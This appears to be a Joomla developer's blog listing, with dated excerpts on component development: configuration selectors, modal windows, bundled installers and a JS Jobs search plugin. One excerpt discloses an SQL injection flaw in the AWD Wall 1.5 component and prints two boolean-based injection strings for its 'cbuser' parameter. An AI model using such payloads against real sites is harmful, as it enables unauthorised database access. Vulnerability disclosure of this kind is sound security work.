I was doing some restructuring to my soon-to-be-released Joomla component, JMyLife, and wanted to have a slect item in the configuration view in order to allow the admin to select a page to direct users to as a "sign up" page. I originally had this item as part of the global view parameters, but I was having issues with Menu Items overriding the global values on specific views. I started digging through the Joomla API documents, expecting to find a simple JHTML statement I could use to produce this form element, but couldn't. I ended up with a solution that works, though I wish it were a bit easier.
|
Thursday, 29 October 2009 09:34
As part of a recent project, I needed to open a modal window using Javascript. Here's how I did it.
Last Updated on Monday, 07 December 2009 12:44
Saturday, 24 October 2009 14:47
Lately in my spare time, I've been working on a new Extension collection for my new site, I Hate My Neighbors. I'm planning on releasing this one as a commercial component soon, and as such I wanted to make sure the install process was as simple as possible. Since the component has some plugins and modules that go along with it, I decided it should go ahead and install everything from a single package. Here's how I did it.
Last Updated on Wednesday, 24 March 2010 19:07
Saturday, 24 October 2009 14:32
Not too long ago a client of mine wanted to have entries from JS Jobs show up in the general Joomla search results. I went ahead and wrote up this quick and dirty search plugin for JS Jobs.
Last Updated on Monday, 07 December 2009 05:13
Friday, 16 October 2009 00:19
The Joomla component AWD Wall 1.5 suffers from an SQL Injection vulnerability in its handling of the 'cbuser' parameter. ?option=com_awdwall&view=awdwall&cbuser=62 and 1=1 limit 1 -- ' ?option=com_awdwall&view=awdwall&cbuser=62 and 1=2 limit 1 -- '
Last Updated on Friday, 16 October 2009 00:27
|

Joomla!
